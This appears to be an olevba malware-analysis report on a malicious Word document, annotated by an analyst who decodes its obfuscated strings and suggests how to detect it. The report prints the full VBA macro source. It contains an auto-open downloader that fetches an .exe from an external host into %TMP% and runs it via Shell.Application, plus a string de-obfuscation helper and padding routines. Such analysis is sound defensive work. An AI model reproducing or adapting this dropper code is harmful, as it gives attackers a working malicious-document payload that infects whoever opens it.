- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS--B- r-1179776.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: r-1179776.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: r-1179776.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Analyst note: auto-exec entry point. Word runs a macro named AutoOpen when the
- ' document is opened (olevba reports it as AutoExec in the table below).
- ' Its only statement calls atqk_x482mp6v, which is defined in one of the .bas
- ' modules listed further down in this report.
- Sub autoopen()
- atqk_x482mp6v
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: r-1179776.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Analyst note: Class1 holds ten near-identical Public Subs with random names.
- ' None of the macros shown in this report calls any of them.
- ' Each one declares an Integer counter, loops over DoEvents up to a bound
- ' (Jl, yB, sb, ...) that is not declared anywhere in the listing, then assigns a
- ' 16-character literal to a local String that is never read afterwards.
- ' Presumably padding meant to bulk up the project and dilute signatures - confirm
- ' in a sandbox before discarding it. The 16-character literals are the likely
- ' cause of the "Base64 Strings" flag olevba raises for this module.
- Public Sub JHyKASbxIHuhtS84()
- Dim geRVTgYKeFHEkG74 As Integer
- ' Jl is undeclared; if Option Explicit is off it is an Empty Variant (compares as 0),
- ' so a loop "6 To 0" would not iterate - TODO confirm against the raw module.
- For geRVTgYKeFHEkG74 = 6 To Jl
- DoEvents
- Next geRVTgYKeFHEkG74
- Dim vLMDtrhALGmHPA31 As String
- ' Assigned and never used.
- vLMDtrhALGmHPA31 = "CtlLoYxCdDrrCR11"
- End Sub
- ' The remaining nine Subs repeat the same template with different names and constants.
- Public Sub xlvLhuAzNZGLWN89()
- Dim WTCBlIIcmnviie69 As Integer
- For WTCBlIIcmnviie69 = 3 To yB
- DoEvents
- Next WTCBlIIcmnviie69
- Dim txdGLvkuqZelnG26 As String
- txdGLvkuqZelnG26 = "EIQWCNvZTnSUDK16"
- End Sub
- Public Sub ofWOXlANArfREH64()
- Dim lrqvxpqOjtKHXZ44 As Integer
- For lrqvxpqOjtKHXZ44 = 9 To sb
- DoEvents
- Next lrqvxpqOjtKHXZ44
- Dim JhORnQktQeAtoT34 As String
- JhORnQktQeAtoT34 = "auVlNAaFAtyjZk14"
- End Sub
- Public Sub iTpzwmkdrKMuCX21()
- Dim TJIibCvUvHEwoB11 As Integer
- For TJIibCvUvHEwoB11 = 9 To LW
- DoEvents
- Next TJIibCvUvHEwoB11
- Dim HIVVBSikgJiUZQ81 As String
- HIVVBSikgJiUZQ81 = "fMxregfSOGJXGF72"
- End Sub
- Public Sub pIJXclhCxOCUIg61()
- Dim UMhzAWxkJUYXMk41 As Integer
- For UMhzAWxkJUYXMk41 = 9 To EN
- DoEvents
- Next UMhzAWxkJUYXMk41
- Dim KQTKzQyaUIqifr31 As String
- KQTKzQyaUIqifr31 = "hCrVyddxzYMxnu12"
- End Sub
- Public Sub vpkmlyrWJDiBrW25()
- Dim XwHnxUqjsQJfjV15 As Integer
- For XwHnxUqjsQJfjV15 = 3 To nR
- DoEvents
- Next XwHnxUqjsQJfjV15
- Dim usyhXcMNzSwbPP86 As String
- usyhXcMNzSwbPP86 = "RvRwNBawxPtDCD76"
- End Sub
- Public Sub uxtXPcgVNZdndx27()
- Dim kflSpdVIGEJSTo17 As Integer
- For kflSpdVIGEJSTo17 = 9 To Ev
- DoEvents
- Next kflSpdVIGEJSTo17
- Dim GbKKfGrepAnaKs88 As String
- GbKKfGrepAnaKs88 = "NhiUFRDSNEtdqV78"
- End Sub
- Public Sub XNMdWIxljyiqdn33()
- Dim ldllVpEGQrJvvE23 As Integer
- For ldllVpEGQrJvvE23 = 7 To fn
- DoEvents
- Next ldllVpEGQrJvvE23
- Dim EeIivNdvntwPKh93 As String
- EeIivNdvntwPKh93 = "zgufZAlMWetBtl83"
- End Sub
- Public Sub CeAuCYmrOCqQVL73()
- Dim wgNdaiAbrWMBpX53 As Integer
- For wgNdaiAbrWMBpX53 = 7 To VT
- DoEvents
- Next wgNdaiAbrWMBpX53
- Dim TyhzAVqoLXvsEI43 As String
- TyhzAVqoLXvsEI43 = "rkFiRnkRfMibHQ23"
- End Sub
- Public Sub dRzRKlperameln47()
- Dim PHnPXMhvvBrjYE27 As Integer
- For PHnPXMhvvBrjYE27 = 1 To UF
- DoEvents
- Next PHnPXMhvvBrjYE27
- Dim MUHnwPBigNIZNg97 As String
- MUHnwPBigNIZNg97 = "lLgYbsyEIVkJdl88"
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO àûâàûâàÀàâï.bas
- in file: r-1179776.doc - OLE stream: u'Macros/VBA/\u0430\u044b\u0432\u0430\u044b\u0432\u0430\u0410\u0430\u0432\u043f'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Analyst note: this module is the downloader stage of the document.
- ' The accented-Latin identifiers look like Cyrillic names rendered in a Latin code
- ' page (the OLE stream name above is given as Cyrillic \u escapes) - presumably an
- ' encoding artefact of the report, not part of the obfuscation; verify on the raw file.
- '
- ' The Declare below binds an obfuscated local name to URLDownloadToFileA in urlmon.
- ' The #If VBA7 branch uses PtrSafe/LongPtr so the declaration also compiles on
- ' 64-bit Office; the #Else branch is the legacy 32-bit form. The five arguments are,
- ' in order: caller, URL, local file name, reserved, status callback.
- #If VBA7 Then
- Private Declare PtrSafe Function ÎðâààÌÐÎëâïâàï Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
- ByVal ÐÎÀðàâûðàÃÎâï As String, _
- ByVal ÐÎÀðàâûðàÃÎâïf As String, _
- ByVal ÐÎÀðàâûðàÃÎâïfd As Long, _
- ByVal ÐÎÀðàâûðàÃÎâïfds As Long) As LongPtr
- #Else
- Private Declare Function ÎðâààÌÐÎëâïâàï Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
- ByVal ÐÎÀðàâûðàÃÎâï As String, _
- ByVal ÐÎÀðàâûðàÃÎâïf As String, _
- ByVal ÐÎÀðàâûðàÃÎâïfd As Long, _
- ByVal ÐÎÀðàâûðàÃÎâïfds As Long) As Long
- #End If
- ' Called from autoopen in ThisDocument. Every literal is passed through
- ' QSzFZhQCxywB, which keeps only the characters at positions 1, 3, 5, ... of its input.
- ' Hand-decoded values (defanged; re-derive before using them as indicators):
- '   arg 1 (URL)  : hxxp://accalamh[.]aspone[.]cz/js/bin[.]exe
- '   Environ name : TMP
- '   arg 2 (path) : %TMP%\fJChjfgD675eDTU.exe
- ' olevba 0.25 sets no IOC flag for this file (flags are MAS--B-) because the URL and
- ' path only exist after decoding; the keyword table below is the only static hit.
- Sub atqk_x482mp6v()
- âàûâÀÀûâïûâà QSzFZhQCxywB("h>tKtYpy:H/G/faRcXcHaxlKa#mƒh`.Jaqs_pMohn{eZ.ZcAzA/vj†s:/pb2inn9.[erx[eV"), Environ(QSzFZhQCxywB("TsMQPQ")) & QSzFZhQCxywB("\8f9JmC}h1jhf)geD06R7i5SeNDBTeU_.'elx€e(")
- End Sub
- ' Download-then-open helper. z0ktwRXRQZl2qo0_ is the URL, d4ok1z1Z0N the local path.
- ' The function never assigns its own name, so the Boolean result is always the
- ' default False, and the API return value is stored in an undeclared variable
- ' that is never checked.
- Function âàûâÀÀûâïûâà(z0ktwRXRQZl2qo0_ As String, d4ok1z1Z0N As String) As Boolean
- ' Step 1: fetch the URL to the local path; caller, reserved and callback are all 0.
- ÏÐûâàÀ = ÎðâààÌÐÎëâïâàï(0&, z0ktwRXRQZl2qo0_, d4ok1z1Z0N, 0&, 0&)
- ' Step 2: the Chr$ run, after the same every-other-character filter, decodes to the
- ' ProgID "Shell.Application" (hand-decoded).
- Set ãíÃØÀÏøâûà = CreateObject(QSzFZhQCxywB(Chr$(83) & Chr$(132) & Chr$(104) & Chr$(55) & Chr$(101) & Chr$(87) & Chr$(108) & Chr$(89) & Chr$(108) & Chr$(131) & Chr$(46) & Chr$(133) & Chr$(65) & Chr$(52) & Chr$(112) & Chr$(97) & Chr$(112) & Chr$(61) & Chr$(108) & Chr$(117) & Chr$(105) & Chr$(47) & Chr$(99) & Chr$(110) & Chr$(97) & Chr$(122) & Chr$(116) & Chr$(59) & Chr$(105) & Chr$(75) & Chr$(111) & Chr$(54) & Chr$(110) & Chr$(115)))
- ' Step 3: .Open on the rebuilt path Environ("TMP") & "\fJChjfgD675eDTU.exe" (hand-decoded).
- ' The path is reconstructed here instead of reusing d4ok1z1Z0N, but decodes to the same
- ' value the caller passed. Detection angle: the Office process writing a new .exe
- ' under %TMP% and then opening it.
- ãíÃØÀÏøâûà.Open Environ(QSzFZhQCxywB(Chr$(84) & Chr$(106) & Chr$(77) & Chr$(107) & Chr$(80) & Chr$(104))) & QSzFZhQCxywB(Chr$(92) & Chr$(114) & Chr$(102) & Chr$(85) & Chr$(74) & Chr$(71) & Chr$(67) & Chr$(85) & Chr$(104) & Chr$(43) & Chr$(106) & Chr$(95) & Chr$(102) & Chr$(67) & Chr$(103) & Chr$(98) & Chr$(68) & Chr$(105) & Chr$(54) & Chr$(110) & Chr$(55) & Chr$(94) & Chr$(53) & Chr$(42) & Chr$(101) & Chr$(98) & Chr$(68) & Chr$(57) & Chr$(84) & Chr$(127) & Chr$(85) & Chr$(118) & Chr$(46) & Chr$(96) & Chr$(101) & Chr$(36) & Chr$(120) & Chr$(117) & Chr$(101) & Chr$(100))
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Open | May open a file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | URLDownloadToFileA | May download files from the Internet |
- +------------+--------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO àïàâïÏÏàâï.bas
- in file: r-1179776.doc - OLE stream: u'Macros/VBA/\u0430\u043f\u0430\u0432\u043f\u041f\u041f\u0430\u0432\u043f'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Analyst note: string de-obfuscation helper used by the downloader module.
- ' Walks the input from position 1 in steps of 2 and appends each character to the
- ' result, so it returns the odd-position characters and drops the filler between
- ' them. Constructed example: "aXbYc" -> "abc".
- ' olevba reports no suspicious keyword or IOC for this module; the routine only
- ' matters in combination with the encoded literals passed to it elsewhere.
- Public Function QSzFZhQCxywB(CwOLiEdjfquIe As String) As String
- ' pytQnFatnd is not declared in this listing.
- For pytQnFatnd = 1 To Len(CwOLiEdjfquIe) Step 2
- QSzFZhQCxywB = QSzFZhQCxywB & Mid(CwOLiEdjfquIe, pytQnFatnd, 1)
- Next
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.